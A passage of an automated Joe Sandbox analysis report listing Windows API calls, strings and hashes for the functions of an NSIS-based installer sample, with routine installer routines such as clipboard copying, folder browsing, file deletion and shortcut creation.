                                        • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                        • ShowWindow.USER32(00000008), ref: 00405333
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                        • CreatePopupMenu.USER32 ref: 00405376
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                        • EmptyClipboard.USER32 ref: 00405411
                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                        • CloseClipboard.USER32 ref: 0040546E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                        • String ID: @rD$New install of "%s" to "%s"${
                                        • API String ID: 2110491804-2409696222
                                        • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                        • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                        • DeleteObject.GDI32(?), ref: 00404A79
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $ @$M$N
                                        • API String ID: 1638840714-3479655940
                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                        APIs
                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                        • String ID: 82D$@%F$@rD$A
                                        • API String ID: 3347642858-1086125096
                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                        • API String ID: 1916479912-1189179171
                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                        • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                        • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                        • FindClose.KERNEL32(?), ref: 00406E33
                                        Strings
                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                        • \*.*, xrefs: 00406D03
                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                        • API String ID: 2035342205-3294556389
                                        • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                        • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                        APIs
                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 3581403547-784952888
                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                        APIs
                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                        Strings
                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                        • API String ID: 542301482-1377821865
                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                        • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                        • API String ID: 20674999-2124804629
                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                        • ShowWindow.USER32(?), ref: 004054D2
                                        • DestroyWindow.USER32 ref: 004054E6
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                        • EnableWindow.USER32(?,?), ref: 0040573C
                                        • EnableWindow.USER32(?,?), ref: 00405757
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID: @rD
                                        • API String ID: 184305955-3814967855
                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                        • GetSysColor.USER32(?), ref: 004041AF
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                        • SendMessageW.USER32(00000000), ref: 00404251
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                        • SetCursor.USER32(00000000), ref: 004042D2
                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                        • SetCursor.USER32(00000000), ref: 004042F6
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
